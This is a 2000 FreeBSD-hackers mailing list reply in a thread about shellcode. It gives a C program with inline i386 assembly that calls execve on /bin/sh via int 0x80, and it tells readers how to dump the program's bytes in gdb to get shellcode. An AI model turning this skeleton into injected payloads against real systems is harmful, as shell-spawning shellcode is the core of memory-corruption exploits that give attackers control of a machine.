From owner-freebsd-hackers Thu Mar 2 9:38:47 2000 Delivered-To: freebsd-hackers@freebsd.org Received: from kcmso1.proxy.att.com (kcmso1.att.com [192.128.133.69]) by hub.freebsd.org (Postfix) with ESMTP id 5E28137BDAD for ; Thu, 2 Mar 2000 09:38:43 -0800 (PST) (envelope-from myevmenkin@att.com) Received: from mo3980r1.ems.att.com ([135.38.12.14]) by kcmso1.proxy.att.com (AT&T IPNS/MSO-2.2) with ESMTP id MAA05812 for ; Thu, 2 Mar 2000 12:38:41 -0500 (EST) Received: from njb140bh1.ems.att.com by mo3980r1.ems.att.com (8.8.8+Sun/ATTEMS-1.4.1 sol2) id MAA19880; Thu, 2 Mar 2000 12:34:10 -0500 (EST) Received: by njb140bh1.ems.att.com with Internet Mail Service (5.5.2650.21) id ; Thu, 2 Mar 2000 12:38:39 -0500 Message-ID: From: "Yevmenkin, Maksim N, CSCIO" To: "'Michael Kyle'" , freebsd-hackers@FreeBSD.ORG Subject: RE: Shell Code... (fwd) Date: Thu, 2 Mar 2000 12:34:36 -0500 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2650.21) Content-Type: text/plain; charset="iso-8859-1" Sender: owner-freebsd-hackers@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.ORG hello all, in case if still need it :) here is good skeleton for shell code :-) i DO NOT want to put REAL shell code here. just do ``x/32bx main'' and you will see what you want. :) i'm too lazy to write in assebmler and hate AT&T syntax :) <-------------------------- cut here -------------------------------------> char *cmd = "/bin/sh"; char *arg[] = { "sh", 0 }; void main(void) { /* execve(cmd, argv, env) */ /* pass ``env'' == NULL */ __asm__("xorl %eax,%eax\n"); __asm__("push %eax"); /* pass ``argv[]'' */ __asm__("push $arg\n"); /* pass ``cmd'' */ __asm__("movl $cmd,%edx\n"); __asm__("movl (%edx),%eax\n"); __asm__("push %eax\n"); /* simulate ``libc call '' */ __asm__("push %ecx\n"); /* system call */ __asm__("xorl %eax,%eax\n"); __asm__("movb $0x3b,%al\n"); __asm__("int $0x80\n"); } <------------------------- end cut ----------------------> thanks emax To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-hackers" in the body of the message